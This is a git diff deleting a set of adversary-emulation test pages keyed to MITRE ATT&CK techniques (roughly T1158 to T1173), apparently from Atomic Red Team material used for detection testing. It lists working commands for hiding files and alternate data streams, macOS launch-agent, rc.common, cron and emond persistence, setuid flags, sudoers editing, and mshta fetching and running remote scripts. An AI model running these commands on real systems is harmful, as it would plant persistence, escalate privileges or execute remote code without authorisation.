-## Atomic Test #2 - Mac Hidden file
-Hide a file on MacOS
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Create Windows System File with Attrib
-Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
-and observe that the Attributes are "SA" for System and Archive.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_modify | File to modify using Attrib command | string | %temp%&#92;T1158.txt|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-attrib.exe +s #{file_to_modify}
-```
-
-#### Cleanup Commands:
-```cmd
-del /A:S #{file_to_modify} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: The file must exist on disk at specified location (#{file_to_modify})
-##### Check Prereq Commands:
-```cmd
-IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) 
-```
-##### Get Prereq Commands:
-```cmd
-echo system_Attrib_T1158 >> #{file_to_modify}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Create Windows Hidden File with Attrib
-Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
-and observe that the Attributes are "SH" for System and Hidden.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_modify | File to modify using Attrib command | string | %temp%&#92;T1158.txt|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-attrib.exe +h #{file_to_modify}
-```
-
-#### Cleanup Commands:
-```cmd
-del /A:H #{file_to_modify} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: The file must exist on disk at specified location (#{file_to_modify})
-##### Check Prereq Commands:
-```cmd
-IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) 
-```
-##### Get Prereq Commands:
-```cmd
-echo system_Attrib_T1158 >> #{file_to_modify}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Hidden files
-Requires Apple Dev Tools
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| filename | path of file to hide | path | /tmp/evil|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-setfile -a V #{filename}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Hide a Directory
-Hide a directory on MacOS
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-touch /var/tmp/T1158_mac.txt
-chflags hidden /var/tmp/T1158_mac.txt
-```
-
-#### Cleanup Commands:
-```sh
-rm /var/tmp/T1158_mac.txt
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Show all hidden files
-Show all hidden files on MacOS
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-defaults write com.apple.finder AppleShowAllFiles YES
-```
-
-#### Cleanup Commands:
-```sh
-defaults write com.apple.finder AppleShowAllFiles NO
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Create ADS command prompt
-Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
-folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | File name of file to create ADS on. | string | %temp%&#92;T1158_has_ads_cmd.txt|
-| ads_filename | Name of ADS file. | string | adstest.txt|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
-for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
-```
-
-#### Cleanup Commands:
-```cmd
-del #{file_name} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: The file must exist on disk at specified location (#{file_name})
-##### Check Prereq Commands:
-```cmd
-IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 ) 
-```
-##### Get Prereq Commands:
-```cmd
-echo normal_text >> #{file_name} >nul 2>&1
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Create ADS PowerShell
-Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
-in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | File name of file to create ADS on. | string | $env:TEMP&#92;T1158_has_ads_powershell.txt|
-| ads_filename | Name of ADS file. | string | adstest.txt|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
-set-content -path #{file_name} -stream #{ads_filename} -value "test2"
-set-content -path . -stream #{ads_filename} -value "test3"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -Path #{file_name} -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The file must exist on disk at specified location (#{file_name})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_name}) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{file_name} | Out-Null
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1159.md b/Atomic_Threat_Coverage/Triggers/T1159.md
deleted file mode 100644
index f816531..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1159.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# T1159 - Launch Agent
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1159)
-<blockquote>Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).
- 
-Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Launch Agent](#atomic-test-1---launch-agent)
-
-
-<br/>
-
-## Atomic Test #1 - Launch Agent
-Create a plist and execute it
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Run it with these steps! 
-1. Create file - .client
-
-2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
-
-3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist
-
-4.
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>KeepAlive</key>
- <true/>
- <key>Label</key>
- <string>com.client.client</string>
- <key>ProgramArguments</key>
- <array>
- <string>/Users/<update path to .clent file>/.client</string>
- </array>
- <key>RunAtLoad</key>
- <true/>
- <key>NSUIElement</key>
- <string>1</string>
-</dict>
-</plist>
-
-5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1160.md b/Atomic_Threat_Coverage/Triggers/T1160.md
deleted file mode 100644
index b014ee3..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1160.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# T1160 - Launch Daemon
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1160)
-<blockquote>Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).
- 
-Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software  (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.
- 
-The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Launch Daemon](#atomic-test-1---launch-daemon)
-
-
-<br/>
-
-## Atomic Test #1 - Launch Daemon
-Utilize LaunchDaemon to launch `Hello World`
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Run it with these steps! 
-1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
-2.
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-    <key>Label</key>
-    <string>com.example.hello</string>
-    <key>ProgramArguments</key>
-    <array>
-        <string>hello</string>
-        <string>world</string>
-    </array>
-    <key>KeepAlive</key>
-    <true/>
-</dict>
-</plist>
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1163.md b/Atomic_Threat_Coverage/Triggers/T1163.md
deleted file mode 100644
index 7171629..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1163.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# T1163 - Rc.common
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1163)
-<blockquote>During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.
-
-Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)
-
-
-<br/>
-
-## Atomic Test #1 - rc.common
-Modify rc.common
-
-[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1164.md b/Atomic_Threat_Coverage/Triggers/T1164.md
deleted file mode 100644
index cdd2b28..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1164.md
+++ /dev/null
@@ -1,73 +0,0 @@
-# T1164 - Re-opened Applications
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1164)
-<blockquote>Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>. 
-
-An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Re-Opened Applications](#atomic-test-1---re-opened-applications)
-
-- [Atomic Test #2 - Re-Opened Applications](#atomic-test-2---re-opened-applications)
-
-
-<br/>
-
-## Atomic Test #1 - Re-Opened Applications
-Plist Method
-
-[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Run it with these steps! 
-1. create a custom plist:
-
-    ~/Library/Preferences/com.apple.loginwindow.plist
-
-or
-
-    ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Re-Opened Applications
-Mac Defaults
-
-[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| script | path to script | path | /path/to/script|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo defaults write com.apple.loginwindow LoginHook #{script}
-sudo defaults delete com.apple.loginwindow LoginHook
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1165.md b/Atomic_Threat_Coverage/Triggers/T1165.md
deleted file mode 100644
index 335acd4..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1165.md
+++ /dev/null
@@ -1,41 +0,0 @@
-# T1165 - Startup Items
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1165)
-<blockquote>Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory. 
-
-An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - add file to Local Library StartupItems](#atomic-test-1---add-file-to-local-library-startupitems)
-
-
-<br/>
-
-## Atomic Test #1 - add file to Local Library StartupItems
-Modify or create an file in /Library/StartupItems
-
-[Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sudo touch /Library/StartupItems/EvilStartup.plist
-```
-
-#### Cleanup Commands:
-```sh
-sudo rm /Library/StartupItems/EvilStartup.plist
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1166.md b/Atomic_Threat_Coverage/Triggers/T1166.md
deleted file mode 100644
index d076b6f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1166.md
+++ /dev/null
@@ -1,124 +0,0 @@
-# T1166 - Setuid and Setgid
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1166)
-<blockquote>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively  (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits with via bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>.
-
-An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future  (Citation: OSX Keydnap malware).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Make and modify binary from C source](#atomic-test-1---make-and-modify-binary-from-c-source)
-
-- [Atomic Test #2 - Set a SetUID flag on file](#atomic-test-2---set-a-setuid-flag-on-file)
-
-- [Atomic Test #3 - Set a SetGID flag on file](#atomic-test-3---set-a-setgid-flag-on-file)
-
-
-<br/>
-
-## Atomic Test #1 - Make and modify binary from C source
-Make, change owner, and change file attributes on a C source code file
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| payload | hello.c payload | path | PathToAtomicsFolder/T1166/src/hello.c|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-cp #{payload} /tmp/hello.c
-sudo chown root /tmp/hello.c
-sudo make /tmp/hello
-sudo chown root /tmp/hello
-sudo chmod u+s /tmp/hello
-/tmp/hello
-```
-
-#### Cleanup Commands:
-```sh
-sudo rm /tmp/hello
-sudo rm /tmp/hello.c
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Set a SetUID flag on file
-This test sets the SetUID flag on a file in Linux and macOS.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sudo touch #{file_to_setuid}
-sudo chown root #{file_to_setuid}
-sudo chmod u+s #{file_to_setuid}
-```
-
-#### Cleanup Commands:
-```sh
-sudo rm #{file_to_setuid}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Set a SetGID flag on file
-This test sets the SetGID flag on a file in Linux and macOS.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sudo touch #{file_to_setuid}
-sudo chown root #{file_to_setuid}
-sudo chmod g+s #{file_to_setuid}
-```
-
-#### Cleanup Commands:
-```sh
-sudo rm #{file_to_setuid}
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1168.md b/Atomic_Threat_Coverage/Triggers/T1168.md
deleted file mode 100644
index 8999ce6..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1168.md
+++ /dev/null
@@ -1,143 +0,0 @@
-# T1168 - Local Job Scheduling
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1168)
-<blockquote>On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).
-
-### cron
-
-System-wide cron jobs are installed by modifying <code>/etc/crontab</code> file, <code>/etc/cron.d/</code> directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.
-
-Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
-
-### at
-
-The at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.
-
-### launchd
-
-Each launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called <code>StartCalendarInterval</code> with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Cron - Replace crontab with referenced file](#atomic-test-1---cron---replace-crontab-with-referenced-file)
-
-- [Atomic Test #2 - Cron - Add script to cron folder](#atomic-test-2---cron---add-script-to-cron-folder)
-
-- [Atomic Test #3 - Event Monitor Daemon Persistence](#atomic-test-3---event-monitor-daemon-persistence)
-
-
-<br/>
-
-## Atomic Test #1 - Cron - Replace crontab with referenced file
-This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command | Command to execute | string | /tmp/evil.sh|
-| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Cron - Add script to cron folder
-This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
-| cron_script_name | Name of file to store in cron folder | string | persistevil|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-echo "#{command}" > /etc/cron.daily/#{cron_script_name}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Event Monitor Daemon Persistence
-This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. 
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Run it with these steps! 
-1. Place this file in /etc/emond.d/rules/atomicredteam.plist
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<array>
-    <dict>
-        <key>name</key>
-        <string>atomicredteam</string>
-        <key>enabled</key>
-        <true/>
-        <key>eventTypes</key>
-        <array>
-            <string>startup</string>
-        </array>
-        <key>actions</key>
-        <array>
-            <dict>
-                <key>command</key>
-                <string>/usr/bin/say</string>
-                <key>user</key>
-                <string>root</string>
-                <key>arguments</key>
-                    <array>
-                        <string>-v Tessa</string>
-                        <string>I am a persistent startup item.</string>
-                    </array>
-                <key>type</key>
-                <string>RunCommand</string>
-            </dict>
-        </array>
-    </dict>
-</array>
-</plist>
-
-2. Place an empty file in /private/var/db/emondClients/
-
-3. sudo touch /private/var/db/emondClients/randomflag
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1169.md b/Atomic_Threat_Coverage/Triggers/T1169.md
deleted file mode 100644
index c94d261..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1169.md
+++ /dev/null
@@ -1,38 +0,0 @@
-# T1169 - Sudo
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1169)
-<blockquote>The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code> (Citation: OSX.Dok Malware). 
-
-Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Sudo usage](#atomic-test-1---sudo-usage)
-
-
-<br/>
-
-## Atomic Test #1 - Sudo usage
-Common Sudo enumeration methods.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo -l
-sudo su
-cat /etc/sudoers
-vim /etc/sudoers
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1170.md b/Atomic_Threat_Coverage/Triggers/T1170.md
deleted file mode 100644
index c4192b7..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1170.md
+++ /dev/null
@@ -1,112 +0,0 @@
-# T1170 - Mshta
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1170)
-<blockquote>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
-
-Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
-
-Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>
-
-They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>
-
-Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject](#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject)
-
-- [Atomic Test #2 - Mshta executes VBScript to execute malicious command](#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-command)
-
-- [Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-3---mshta-executes-remote-html-application-hta)
-
-
-<br/>
-
-## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
-Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/mshta.sct|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Mshta executes VBScript to execute malicious command
-Run a local VB script to run local user enumeration powershell command.
-This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
-Upon execution, a new PowerShell windows will be opened that displays user information.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)
-Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/T1170.hta|
-| temp_file | temp_file location for hta | string | $env:appdata&#92;Microsoft&#92;Windows&#92;Start Menu&#92;Programs&#92;Startup&#92;T1170.hta|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$var =Invoke-WebRequest "#{hta_url}"
-$var.content|out-file "#{temp_file}"
-mshta "#{temp_file}"
-```
-
-#### Cleanup Commands:
-```powershell
-remove-item "#{temp_file}" -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1173.md b/Atomic_Threat_Coverage/Triggers/T1173.md
deleted file mode 100644
index f1cad0a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1173.md
+++ /dev/null
@@ -1,69 +0,0 @@
-# T1173 - Dynamic Data Exchange
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1173)
